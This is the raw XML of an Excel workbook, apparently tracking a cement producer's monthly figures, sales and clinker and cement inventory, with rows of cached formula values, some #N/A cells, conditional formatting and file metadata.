        <f ca="1" t="shared" si="18"/>
        <v>3.64487999999999</v>
      </c>
      <c r="L20" s="12">
        <f ca="1" t="shared" si="19"/>
        <v>3.72026599999999</v>
      </c>
      <c r="M20" s="12">
        <f ca="1" t="shared" si="20"/>
        <v>3.57609899999999</v>
      </c>
      <c r="N20" s="12">
        <f ca="1" t="shared" si="21"/>
        <v>3.47562399999999</v>
      </c>
      <c r="O20" s="12">
        <f ca="1" t="shared" si="22"/>
        <v>3.42129499999999</v>
      </c>
      <c r="P20" s="12">
        <f ca="1" t="shared" si="23"/>
        <v>3.39408199999999</v>
      </c>
      <c r="Q20" s="12">
        <f ca="1" t="shared" si="24"/>
        <v>3.46327499999999</v>
      </c>
      <c r="R20" s="12">
        <f ca="1" t="shared" si="25"/>
        <v>3.36331899999999</v>
      </c>
      <c r="S20" s="12">
        <f ca="1" t="shared" si="26"/>
        <v>3.35713699999999</v>
      </c>
      <c r="T20" s="12">
        <f ca="1" t="shared" si="27"/>
        <v>3.33519799999999</v>
      </c>
      <c r="U20" s="12">
        <f ca="1" t="shared" si="28"/>
        <v>3.36731899999999</v>
      </c>
      <c r="V20" s="12">
        <f ca="1" t="shared" si="29"/>
        <v>3.29007899999999</v>
      </c>
      <c r="W20" s="12">
        <f ca="1" t="shared" si="30"/>
        <v>3.23617799999999</v>
      </c>
      <c r="X20" s="12">
        <f ca="1" t="shared" si="31"/>
        <v>3.11996999999999</v>
      </c>
      <c r="Y20" s="12">
        <f ca="1" t="shared" si="32"/>
        <v>3.36298699999999</v>
      </c>
      <c r="Z20" s="12">
        <f ca="1" t="shared" si="33"/>
        <v>3.23921099999999</v>
      </c>
      <c r="AA20" s="12">
        <f ca="1" t="shared" si="34"/>
        <v>3.23179499999999</v>
      </c>
      <c r="AB20" s="12">
        <f ca="1" t="shared" si="35"/>
        <v>3.37697099999999</v>
      </c>
      <c r="AC20" s="12">
        <f ca="1" t="shared" si="36"/>
        <v>3.38872099999999</v>
      </c>
      <c r="AD20" s="12">
        <f ca="1" t="shared" si="37"/>
        <v>3.38536999999999</v>
      </c>
      <c r="AE20" s="12">
        <f ca="1" t="shared" si="38"/>
        <v>3.39890899999999</v>
      </c>
      <c r="AF20" s="12">
        <f ca="1" t="shared" si="39"/>
        <v>3.57274299999999</v>
      </c>
      <c r="AG20" s="12">
        <f ca="1" t="shared" si="40"/>
        <v>3.56218199999999</v>
      </c>
      <c r="AH20" s="12">
        <f ca="1" t="shared" si="41"/>
        <v>3.76658299999999</v>
      </c>
      <c r="AI20" s="12">
        <f ca="1" t="shared" si="42"/>
        <v>3.76131699999999</v>
      </c>
      <c r="AJ20" s="12">
        <f ca="1" t="shared" si="43"/>
        <v>3.76131699999999</v>
      </c>
      <c r="AK20" s="12">
        <f ca="1" t="shared" si="44"/>
        <v>3.76131699999999</v>
      </c>
      <c r="AL20" s="7"/>
    </row>
    <row r="21" ht="16.5" customHeight="1" spans="1:38">
      <c r="A21" s="9"/>
      <c r="B21" s="10"/>
      <c r="C21" s="11"/>
      <c r="D21" s="11"/>
      <c r="E21" s="12" t="e">
        <f ca="1" t="shared" si="12"/>
        <v>#N/A</v>
      </c>
      <c r="F21" s="12" t="e">
        <f ca="1" t="shared" si="13"/>
        <v>#N/A</v>
      </c>
      <c r="G21" s="12" t="e">
        <f ca="1" t="shared" si="14"/>
        <v>#N/A</v>
      </c>
      <c r="H21" s="12" t="e">
        <f ca="1" t="shared" si="15"/>
        <v>#N/A</v>
      </c>
      <c r="I21" s="12" t="e">
        <f ca="1" t="shared" si="16"/>
        <v>#N/A</v>
      </c>
      <c r="J21" s="12" t="e">
        <f ca="1" t="shared" si="17"/>
        <v>#N/A</v>
      </c>
      <c r="K21" s="12" t="e">
        <f ca="1" t="shared" si="18"/>
        <v>#N/A</v>
      </c>
      <c r="L21" s="12" t="e">
        <f ca="1" t="shared" si="19"/>
        <v>#N/A</v>
      </c>
      <c r="M21" s="12" t="e">
        <f ca="1" t="shared" si="20"/>
        <v>#N/A</v>
      </c>
      <c r="N21" s="12" t="e">
        <f ca="1" t="shared" si="21"/>
        <v>#N/A</v>
      </c>
      <c r="O21" s="12" t="e">
        <f ca="1" t="shared" si="22"/>
        <v>#N/A</v>
      </c>
      <c r="P21" s="12" t="e">
        <f ca="1" t="shared" si="23"/>
        <v>#N/A</v>
      </c>
      <c r="Q21" s="12" t="e">
        <f ca="1" t="shared" si="24"/>
        <v>#N/A</v>
      </c>
      <c r="R21" s="12" t="e">
        <f ca="1" t="shared" si="25"/>
        <v>#N/A</v>
      </c>
      <c r="S21" s="12" t="e">
        <f ca="1" t="shared" si="26"/>
        <v>#N/A</v>
      </c>
      <c r="T21" s="12" t="e">
        <f ca="1" t="shared" si="27"/>
        <v>#N/A</v>
      </c>
      <c r="U21" s="12" t="e">
        <f ca="1" t="shared" si="28"/>
        <v>#N/A</v>
      </c>
      <c r="V21" s="12" t="e">
        <f ca="1" t="shared" si="29"/>
        <v>#N/A</v>
      </c>
      <c r="W21" s="12" t="e">
        <f ca="1" t="shared" si="30"/>
        <v>#N/A</v>
      </c>
      <c r="X21" s="12" t="e">
        <f ca="1" t="shared" si="31"/>
        <v>#N/A</v>
      </c>
      <c r="Y21" s="12" t="e">
        <f ca="1" t="shared" si="32"/>
        <v>#N/A</v>
      </c>
      <c r="Z21" s="12" t="e">
        <f ca="1" t="shared" si="33"/>
        <v>#N/A</v>
      </c>
      <c r="AA21" s="12" t="e">
        <f ca="1" t="shared" si="34"/>
        <v>#N/A</v>
      </c>
      <c r="AB21" s="12" t="e">
        <f ca="1" t="shared" si="35"/>
        <v>#N/A</v>
      </c>
      <c r="AC21" s="12" t="e">
        <f ca="1" t="shared" si="36"/>
        <v>#N/A</v>
      </c>
      <c r="AD21" s="12" t="e">
        <f ca="1" t="shared" si="37"/>
        <v>#N/A</v>
      </c>
      <c r="AE21" s="12" t="e">
        <f ca="1" t="shared" si="38"/>
        <v>#N/A</v>
      </c>
      <c r="AF21" s="12" t="e">
        <f ca="1" t="shared" si="39"/>
        <v>#N/A</v>
      </c>
      <c r="AG21" s="12" t="e">
        <f ca="1" t="shared" si="40"/>
        <v>#N/A</v>
      </c>
      <c r="AH21" s="12" t="e">
        <f ca="1" t="shared" si="41"/>
        <v>#N/A</v>
      </c>
      <c r="AI21" s="12" t="e">
        <f ca="1" t="shared" si="42"/>
        <v>#N/A</v>
      </c>
      <c r="AJ21" s="12" t="e">
        <f ca="1" t="shared" si="43"/>
        <v>#N/A</v>
      </c>
      <c r="AK21" s="12" t="e">
        <f ca="1" t="shared" si="44"/>
        <v>#N/A</v>
      </c>
      <c r="AL21" s="7"/>
    </row>
    <row r="22" ht="16.5" customHeight="1" spans="1:38">
      <c r="A22" s="9"/>
      <c r="B22" s="10" t="s">
        <v>436</v>
      </c>
      <c r="C22" s="11" t="s">
        <v>321</v>
      </c>
      <c r="D22" s="11"/>
      <c r="E22" s="12">
        <f ca="1" t="shared" si="12"/>
        <v>0.150256</v>
      </c>
      <c r="F22" s="12">
        <f ca="1" t="shared" si="13"/>
        <v>0.150256</v>
      </c>
      <c r="G22" s="12">
        <f ca="1" t="shared" si="14"/>
        <v>0.150256</v>
      </c>
      <c r="H22" s="12">
        <f ca="1" t="shared" si="15"/>
        <v>0.150256</v>
      </c>
      <c r="I22" s="12">
        <f ca="1" t="shared" si="16"/>
        <v>0.150256</v>
      </c>
      <c r="J22" s="12">
        <f ca="1" t="shared" si="17"/>
        <v>0.150256</v>
      </c>
      <c r="K22" s="12">
        <f ca="1" t="shared" si="18"/>
        <v>0.150256</v>
      </c>
      <c r="L22" s="12">
        <f ca="1" t="shared" si="19"/>
        <v>0.150256</v>
      </c>
      <c r="M22" s="12">
        <f ca="1" t="shared" si="20"/>
        <v>0.150256</v>
      </c>
      <c r="N22" s="12">
        <f ca="1" t="shared" si="21"/>
        <v>0.150256</v>
      </c>
      <c r="O22" s="12">
        <f ca="1" t="shared" si="22"/>
        <v>0.150256</v>
      </c>
      <c r="P22" s="12">
        <f ca="1" t="shared" si="23"/>
        <v>0.150256</v>
      </c>
      <c r="Q22" s="12">
        <f ca="1" t="shared" si="24"/>
        <v>0.150256</v>
      </c>
      <c r="R22" s="12">
        <f ca="1" t="shared" si="25"/>
        <v>0.150256</v>
      </c>
      <c r="S22" s="12">
        <f ca="1" t="shared" si="26"/>
        <v>0.150256</v>
      </c>
      <c r="T22" s="12">
        <f ca="1" t="shared" si="27"/>
        <v>0.150256</v>
      </c>
      <c r="U22" s="12">
        <f ca="1" t="shared" si="28"/>
        <v>0.150256</v>
      </c>
      <c r="V22" s="12">
        <f ca="1" t="shared" si="29"/>
        <v>0.150256</v>
      </c>
      <c r="W22" s="12">
        <f ca="1" t="shared" si="30"/>
        <v>0.150256</v>
      </c>
      <c r="X22" s="12">
        <f ca="1" t="shared" si="31"/>
        <v>0.150256</v>
      </c>
      <c r="Y22" s="12">
        <f ca="1" t="shared" si="32"/>
        <v>0.150256</v>
      </c>
      <c r="Z22" s="12">
        <f ca="1" t="shared" si="33"/>
        <v>0.150256</v>
      </c>
      <c r="AA22" s="12">
        <f ca="1" t="shared" si="34"/>
        <v>0.150256</v>
      </c>
      <c r="AB22" s="12">
        <f ca="1" t="shared" si="35"/>
        <v>0.150256</v>
      </c>
      <c r="AC22" s="12">
        <f ca="1" t="shared" si="36"/>
        <v>0.150256</v>
      </c>
      <c r="AD22" s="12">
        <f ca="1" t="shared" si="37"/>
        <v>0.150256</v>
      </c>
      <c r="AE22" s="12">
        <f ca="1" t="shared" si="38"/>
        <v>0.150256</v>
      </c>
      <c r="AF22" s="12">
        <f ca="1" t="shared" si="39"/>
        <v>0.150256</v>
      </c>
      <c r="AG22" s="12">
        <f ca="1" t="shared" si="40"/>
        <v>0.150256</v>
      </c>
      <c r="AH22" s="12">
        <f ca="1" t="shared" si="41"/>
        <v>0.150256</v>
      </c>
      <c r="AI22" s="12">
        <f ca="1" t="shared" si="42"/>
        <v>0.150256</v>
      </c>
      <c r="AJ22" s="12">
        <f ca="1" t="shared" si="43"/>
        <v>0.150256</v>
      </c>
      <c r="AK22" s="12">
        <f ca="1" t="shared" si="44"/>
        <v>0.150256</v>
      </c>
      <c r="AL22" s="7"/>
    </row>
    <row r="23" ht="16.5" customHeight="1" spans="1:38">
      <c r="A23" s="9"/>
      <c r="B23" s="10" t="s">
        <v>437</v>
      </c>
      <c r="C23" s="11" t="s">
        <v>345</v>
      </c>
      <c r="D23" s="11"/>
      <c r="E23" s="12">
        <f ca="1" t="shared" si="12"/>
        <v>26.1561994</v>
      </c>
      <c r="F23" s="12">
        <f ca="1" t="shared" si="13"/>
        <v>25.3917754</v>
      </c>
      <c r="G23" s="12">
        <f ca="1" t="shared" si="14"/>
        <v>25.0623991</v>
      </c>
      <c r="H23" s="12">
        <f ca="1" t="shared" si="15"/>
        <v>25.1151838</v>
      </c>
      <c r="I23" s="12">
        <f ca="1" t="shared" si="16"/>
        <v>25.6404537</v>
      </c>
      <c r="J23" s="12">
        <f ca="1" t="shared" si="17"/>
        <v>26.0523157</v>
      </c>
      <c r="K23" s="12">
        <f ca="1" t="shared" si="18"/>
        <v>25.7123798</v>
      </c>
      <c r="L23" s="12">
        <f ca="1" t="shared" si="19"/>
        <v>25.6634258</v>
      </c>
      <c r="M23" s="12">
        <f ca="1" t="shared" si="20"/>
        <v>25.2329085</v>
      </c>
      <c r="N23" s="12">
        <f ca="1" t="shared" si="21"/>
        <v>24.8898025</v>
      </c>
      <c r="O23" s="12">
        <f ca="1" t="shared" si="22"/>
        <v>24.8738965</v>
      </c>
      <c r="P23" s="12">
        <f ca="1" t="shared" si="23"/>
        <v>24.6961885</v>
      </c>
      <c r="Q23" s="12">
        <f ca="1" t="shared" si="24"/>
        <v>24.7980034</v>
      </c>
      <c r="R23" s="12">
        <f ca="1" t="shared" si="25"/>
        <v>24.5174764</v>
      </c>
      <c r="S23" s="12">
        <f ca="1" t="shared" si="26"/>
        <v>24.5045469</v>
      </c>
      <c r="T23" s="12">
        <f ca="1" t="shared" si="27"/>
        <v>23.8562399</v>
      </c>
      <c r="U23" s="12">
        <f ca="1" t="shared" si="28"/>
        <v>23.3766963</v>
      </c>
      <c r="V23" s="12">
        <f ca="1" t="shared" si="29"/>
        <v>23.0162502</v>
      </c>
      <c r="W23" s="12">
        <f ca="1" t="shared" si="30"/>
        <v>22.3171795</v>
      </c>
      <c r="X23" s="12">
        <f ca="1" t="shared" si="31"/>
        <v>21.9721865</v>
      </c>
      <c r="Y23" s="12">
        <f ca="1" t="shared" si="32"/>
        <v>21.9186625</v>
      </c>
      <c r="Z23" s="12">
        <f ca="1" t="shared" si="33"/>
        <v>21.6312115</v>
      </c>
      <c r="AA23" s="12">
        <f ca="1" t="shared" si="34"/>
        <v>21.6183499</v>
      </c>
      <c r="AB23" s="12">
        <f ca="1" t="shared" si="35"/>
        <v>21.7185547</v>
      </c>
      <c r="AC23" s="12">
        <f ca="1" t="shared" si="36"/>
        <v>21.2369957</v>
      </c>
      <c r="AD23" s="12">
        <f ca="1" t="shared" si="37"/>
        <v>21.1875317</v>
      </c>
      <c r="AE23" s="12">
        <f ca="1" t="shared" si="38"/>
        <v>21.2228627</v>
      </c>
      <c r="AF23" s="12">
        <f ca="1" t="shared" si="39"/>
        <v>21.067299</v>
      </c>
      <c r="AG23" s="12">
        <f ca="1" t="shared" si="40"/>
        <v>20.646031</v>
      </c>
      <c r="AH23" s="12">
        <f ca="1" t="shared" si="41"/>
        <v>20.6519052</v>
      </c>
      <c r="AI23" s="12">
        <f ca="1" t="shared" si="42"/>
        <v>20.3209539</v>
      </c>
      <c r="AJ23" s="12">
        <f ca="1" t="shared" si="43"/>
        <v>20.3709539</v>
      </c>
      <c r="AK23" s="12">
        <f ca="1" t="shared" si="44"/>
        <v>20.3709539</v>
      </c>
      <c r="AL23" s="7"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="E1:AK1"/>
    <mergeCell ref="A4:A14"/>
    <mergeCell ref="A15:A23"/>
    <mergeCell ref="A1:C2"/>
  </mergeCells>
  <conditionalFormatting sqref="AL10:AL14">
    <cfRule type="cellIs" dxfId="0" priority="4" stopIfTrue="1" operator="notEqual">
      <formula>0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E4:AK23">
    <cfRule type="expression" dxfId="8" priority="1" stopIfTrue="1">
      <formula>ISERROR(E4)</formula>
    </cfRule>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dt</Company>
  <Application>Microsoft Excel</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>45</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>ICLPTOVOVTNRYY</vt:lpstr>
      <vt:lpstr>XXXXXXX</vt:lpstr>
      <vt:lpstr>r</vt:lpstr>
      <vt:lpstr>yc</vt:lpstr>
      <vt:lpstr>kb</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调整表</vt:lpstr>
      <vt:lpstr>月报</vt:lpstr>
      <vt:lpstr>信息表</vt:lpstr>
      <vt:lpstr>月报信息表新</vt:lpstr>
      <vt:lpstr>日销售量</vt:lpstr>
      <vt:lpstr>指标监控</vt:lpstr>
      <vt:lpstr>熟料库存</vt:lpstr>
      <vt:lpstr>水泥库存</vt:lpstr>
      <vt:lpstr>库存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zero</dc:creator>
  <cp:lastModifiedBy>月半土成</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-01-08T02:44:00Z</dcterms:created>
  <cp:lastPrinted>2012-02-28T03:07:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-09T09:59:31Z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2052-12.1.0.24031</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>9E4D3E4F23094014B03A0C5A6D268DDA_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>